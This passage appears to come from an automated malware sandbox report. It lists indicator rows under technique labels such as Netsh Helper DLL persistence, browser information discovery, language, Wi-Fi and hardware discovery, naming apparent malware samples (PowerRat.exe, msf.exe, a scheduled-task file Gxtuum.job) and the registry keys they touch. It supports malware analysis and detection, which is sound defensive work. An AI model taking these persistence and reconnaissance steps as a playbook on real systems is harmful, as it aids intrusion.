File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\metadata C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File created C:\Windows\SystemTemp\816aa4b7-5aad-4d5c-b75c-912e0fd35b69.tmp C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\msedge_installer.log C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\metadata C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\msedge_installer.log C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\metadata C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File created C:\Windows\SystemTemp\c6a973e3-7f65-4dd5-8924-fd63f9e6c8d9.tmp C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\msedge_installer.log C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\msedge_installer.log C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\metadata C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Windows\Tasks\Test Task17.job C:\Windows\system32\svchost.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\Rage.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\PowerRat.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\856.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\ciscotest.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\7777.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\7777.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\q1wnx5ir.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\svc1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\alexshlu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\99awhy8l.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\surfex.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\StUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\StUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\qNVQKFyM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\temp_16933.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\7777.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\program files (x86)\internet explorer\iexplore.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\TCP.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\q1wnx5ir.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\ProcessMonitor\Procmon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\msf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\key.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\temp_16933.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\7777.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\alexshlu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\S%D0%B5tu%D1%80111.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\temp_16933.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\sommnx\bmxe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A (63 identical events)
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\werfault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\system32\werfault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Desktop\Files\S%D0%B5tu%D1%80111.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
